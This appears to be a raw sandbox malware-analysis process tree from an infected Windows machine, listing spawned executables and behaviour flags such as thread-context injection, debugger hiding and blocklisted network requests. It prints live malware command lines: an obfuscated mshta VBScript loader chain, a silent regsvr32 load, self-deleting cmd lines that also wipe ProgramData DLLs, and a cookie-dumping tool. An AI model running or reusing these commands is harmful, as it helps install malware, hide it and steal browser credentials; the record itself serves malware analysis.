C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\8533.exeC:\Users\Admin\AppData\Local\Temp\8533.exe1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\8831.exeC:\Users\Admin\AppData\Local\Temp\8831.exe1⤵
- Suspicious use of SetWindowsHookEx
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\A7EF.exeC:\Users\Admin\AppData\Local\Temp\A7EF.exe1⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\A7EF.exe"2⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\B2CE.exeC:\Users\Admin\AppData\Local\Temp\B2CE.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\C0AA.exeC:\Users\Admin\AppData\Local\Temp\C0AA.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\647349126.exe"C:\Users\Admin\AppData\Local\Temp\647349126.exe"2⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\1371397063.exe"C:\Users\Admin\AppData\Local\Temp\1371397063.exe"2⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\C454.exeC:\Users\Admin\AppData\Local\Temp\C454.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\CA9E.exeC:\Users\Admin\AppData\Local\Temp\CA9E.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\D4E0.exeC:\Users\Admin\AppData\Local\Temp\D4E0.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\DB5A.exeC:\Users\Admin\AppData\Local\Temp\DB5A.exe1⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\E0C9.exeC:\Users\Admin\AppData\Local\Temp\E0C9.exe1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\E0C9.exe"{path}"2⤵
-
C:\Users\Admin\AppData\Local\Temp\E0C9.exe"{path}"2⤵
-
C:\Users\Admin\AppData\Local\Temp\EE38.exeC:\Users\Admin\AppData\Local\Temp\EE38.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\F86A.exeC:\Users\Admin\AppData\Local\Temp\F86A.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\FF51.exeC:\Users\Admin\AppData\Local\Temp\FF51.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\201.exeC:\Users\Admin\AppData\Local\Temp\201.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\742.exeC:\Users\Admin\AppData\Local\Temp\742.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\742.exe"C:\Users\Admin\AppData\Local\Temp\742.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\15AB.exeC:\Users\Admin\AppData\Local\Temp\15AB.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"1⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCriPt: CLOse ( cReatEoBJEcT ( "wSCrIPT.sHelL" ). RUn ( "cmD.EXe /Q /C COpY /y ""C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"" uQLGv.exe > Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF """" == """" for %V In ( ""C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"" ) do taskkill -IM ""%~nXV"" -F > nul " , 0) )2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpY /y "C:\Users\Admin\AppData\Local\Temp\uQLGv.exe" uQLGv.exe> Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF "" == "" for %V In ( "C:\Users\Admin\AppData\Local\Temp\uQLGv.exe" ) do taskkill -IM "%~nXV" -F> nul3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "uQLGv.exe" -F4⤵
- Kills process with taskkill
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\*\" -spe -an -ai#7zMap19030:2006:7zEvent116241⤵
- Suspicious use of FindShellTrayWindow
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\*\" -ad -an -ai#7zMap27134:2006:7zEvent260381⤵
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe"1⤵
- Loads dropped DLL
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\742.exe"C:\Users\Admin\AppData\Local\Temp\742.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\742.exe"C:\Users\Admin\AppData\Local\Temp\742.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\742.exe"C:\Users\Admin\AppData\Local\Temp\742.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\C0AA.exe"C:\Users\Admin\AppData\Local\Temp\C0AA.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\647349126.exe"C:\Users\Admin\AppData\Local\Temp\647349126.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\201.exe"C:\Users\Admin\AppData\Local\Temp\201.exe"1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\FF51.exe"C:\Users\Admin\AppData\Local\Temp\FF51.exe"1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\C454.exe"C:\Users\Admin\AppData\Local\Temp\C454.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\647349126.exe"C:\Users\Admin\AppData\Local\Temp\647349126.exe"1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\CA9E.exe"C:\Users\Admin\AppData\Local\Temp\CA9E.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\1371397063.exe"C:\Users\Admin\AppData\Local\Temp\1371397063.exe"1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\D4E0.exe"C:\Users\Admin\AppData\Local\Temp\D4E0.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\DB5A.exe"C:\Users\Admin\AppData\Local\Temp\DB5A.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\E0C9.exe"C:\Users\Admin\AppData\Local\Temp\E0C9.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\E0C9.exe"{path}"2⤵
-
C:\Users\Admin\AppData\Local\Temp\EE38.exe"C:\Users\Admin\AppData\Local\Temp\EE38.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\F86A.exe"C:\Users\Admin\AppData\Local\Temp\F86A.exe"1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\A492.exeC:\Users\Admin\AppData\Local\Temp\A492.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\1109.exe"C:\Users\Admin\AppData\Local\Temp\1109.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\18AC.exe"C:\Users\Admin\AppData\Local\Temp\18AC.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\21B5.exe"C:\Users\Admin\AppData\Local\Temp\21B5.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\8533.exe"C:\Users\Admin\AppData\Local\Temp\8533.exe"1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\8831.exe"C:\Users\Admin\AppData\Local\Temp\8831.exe"1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\haleng.exe"C:\Users\Admin\AppData\Local\Temp\haleng.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
-
C:\Users\Admin\AppData\Local\Temp\E0C9.exe"C:\Users\Admin\AppData\Local\Temp\E0C9.exe"1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\E0C9.exe"{path}"2⤵
-
C:\Users\Admin\AppData\Local\Temp\A492.exe"C:\Users\Admin\AppData\Local\Temp\A492.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\647349126.exe"C:\Users\Admin\AppData\Local\Temp\647349126.exe"1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"1⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCriPt: CLOse ( cReatEoBJEcT ( "wSCrIPT.sHelL" ). RUn ( "cmD.EXe /Q /C COpY /y ""C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"" uQLGv.exe > Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF """" == """" for %V In ( ""C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"" ) do taskkill -IM ""%~nXV"" -F > nul " , 0) )2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpY /y "C:\Users\Admin\AppData\Local\Temp\uQLGv.exe" uQLGv.exe> Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF "" == "" for %V In ( "C:\Users\Admin\AppData\Local\Temp\uQLGv.exe" ) do taskkill -IM "%~nXV" -F> nul3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "uQLGv.exe" -F4⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\A492.exe"C:\Users\Admin\AppData\Local\Temp\A492.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\647349126.exe"C:\Users\Admin\AppData\Local\Temp\647349126.exe"1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"1⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCriPt: CLOse ( cReatEoBJEcT ( "wSCrIPT.sHelL" ). RUn ( "cmD.EXe /Q /C COpY /y ""C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"" uQLGv.exe > Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF """" == """" for %V In ( ""C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"" ) do taskkill -IM ""%~nXV"" -F > nul " , 0) )2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpY /y "C:\Users\Admin\AppData\Local\Temp\uQLGv.exe" uQLGv.exe> Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF "" == "" for %V In ( "C:\Users\Admin\AppData\Local\Temp\uQLGv.exe" ) do taskkill -IM "%~nXV" -F> nul3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "uQLGv.exe" -F4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" .\ma0IL_U1.C_T -u /s2⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\E0C9.exe"C:\Users\Admin\AppData\Local\Temp\E0C9.exe"1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\E0C9.exe"{path}"2⤵
-
C:\Users\Admin\AppData\Local\Temp\EE38.exe"C:\Users\Admin\AppData\Local\Temp\EE38.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\D4E0.exe"C:\Users\Admin\AppData\Local\Temp\D4E0.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\A492.exe"C:\Users\Admin\AppData\Local\Temp\A492.exe"1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\647349126.exe"C:\Users\Admin\AppData\Local\Temp\647349126.exe"1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"1⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCriPt: CLOse ( cReatEoBJEcT ( "wSCrIPT.sHelL" ). RUn ( "cmD.EXe /Q /C COpY /y ""C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"" uQLGv.exe > Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF """" == """" for %V In ( ""C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"" ) do taskkill -IM ""%~nXV"" -F > nul " , 0) )2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpY /y "C:\Users\Admin\AppData\Local\Temp\uQLGv.exe" uQLGv.exe> Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF "" == "" for %V In ( "C:\Users\Admin\AppData\Local\Temp\uQLGv.exe" ) do taskkill -IM "%~nXV" -F> nul3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "uQLGv.exe" -F4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" .\ma0IL_U1.C_T -u /s2⤵
-
C:\Users\Admin\AppData\Local\Temp\D4E0.exe"C:\Users\Admin\AppData\Local\Temp\D4E0.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"1⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCriPt: CLOse ( cReatEoBJEcT ( "wSCrIPT.sHelL" ). RUn ( "cmD.EXe /Q /C COpY /y ""C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"" uQLGv.exe > Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF """" == """" for %V In ( ""C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"" ) do taskkill -IM ""%~nXV"" -F > nul " , 0) )2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpY /y "C:\Users\Admin\AppData\Local\Temp\uQLGv.exe" uQLGv.exe> Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF "" == "" for %V In ( "C:\Users\Admin\AppData\Local\Temp\uQLGv.exe" ) do taskkill -IM "%~nXV" -F> nul3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "uQLGv.exe" -F4⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\DB5A.exe"C:\Users\Admin\AppData\Local\Temp\DB5A.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"1⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCriPt: CLOse ( cReatEoBJEcT ( "wSCrIPT.sHelL" ). RUn ( "cmD.EXe /Q /C COpY /y ""C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"" uQLGv.exe > Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF """" == """" for %V In ( ""C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"" ) do taskkill -IM ""%~nXV"" -F > nul " , 0) )2⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpY /y "C:\Users\Admin\AppData\Local\Temp\uQLGv.exe" uQLGv.exe> Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF "" == "" for %V In ( "C:\Users\Admin\AppData\Local\Temp\uQLGv.exe" ) do taskkill -IM "%~nXV" -F> nul3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "uQLGv.exe" -F4⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\D4E0.exe"C:\Users\Admin\AppData\Local\Temp\D4E0.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\DB5A.exe"C:\Users\Admin\AppData\Local\Temp\DB5A.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\E0C9.exe"C:\Users\Admin\AppData\Local\Temp\E0C9.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\E0C9.exe"{path}"2⤵
-
C:\Users\Admin\AppData\Local\Temp\EE38.exe"C:\Users\Admin\AppData\Local\Temp\EE38.exe"1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\wmsetup.log1⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4160 -s 12042⤵
- Program crash
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5568 -s 16882⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\CA9E.exe"C:\Users\Admin\AppData\Local\Temp\CA9E.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\C0AA.exe"C:\Users\Admin\AppData\Local\Temp\C0AA.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\647349126.exe"C:\Users\Admin\AppData\Local\Temp\647349126.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\1371397063.exe"C:\Users\Admin\AppData\Local\Temp\1371397063.exe"2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\C454.exe"C:\Users\Admin\AppData\Local\Temp\C454.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\FF51.exe"C:\Users\Admin\AppData\Local\Temp\FF51.exe"1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\4a63f199e6924531950738d7562104ae /t 5364 /p 4081⤵
-
C:\Users\Admin\AppData\Local\Temp\F86A.exe"C:\Users\Admin\AppData\Local\Temp\F86A.exe" C:\Users\Admin\AppData\Local\Temp\JavaDeployReg.log1⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\E0C9.exe"C:\Users\Admin\AppData\Local\Temp\E0C9.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\E0C9.exe"{path}"2⤵
-
C:\Users\Admin\AppData\Local\Temp\E0C9.exe"{path}"2⤵
-
C:\Users\Admin\AppData\Local\Temp\E0C9.exe"{path}"2⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6976 -s 28922⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\18AC.exe"C:\Users\Admin\AppData\Local\Temp\18AC.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\21B5.exe"C:\Users\Admin\AppData\Local\Temp\21B5.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\tcfoaowc.mf0\app.exe"C:\Users\Admin\AppData\Local\Temp\tcfoaowc.mf0\app.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\tcfoaowc.mf0\app.exe"C:\Users\Admin\AppData\Local\Temp\tcfoaowc.mf0\app.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\tcfoaowc.mf0\app.exe"C:\Users\Admin\AppData\Local\Temp\tcfoaowc.mf0\app.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\tcfoaowc.mf0\app.exe"C:\Users\Admin\AppData\Local\Temp\tcfoaowc.mf0\app.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\tcfoaowc.mf0\app.exe"C:\Users\Admin\AppData\Local\Temp\tcfoaowc.mf0\app.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\tcfoaowc.mf0\app.exe"C:\Users\Admin\AppData\Local\Temp\tcfoaowc.mf0\app.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\xh4sm0b1.hgj\build.exe"C:\Users\Admin\AppData\Local\Temp\xh4sm0b1.hgj\build.exe"1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\xh4sm0b1.hgj\build.exe" & del C:\ProgramData\*.dll & exit2⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build.exe /f3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
-
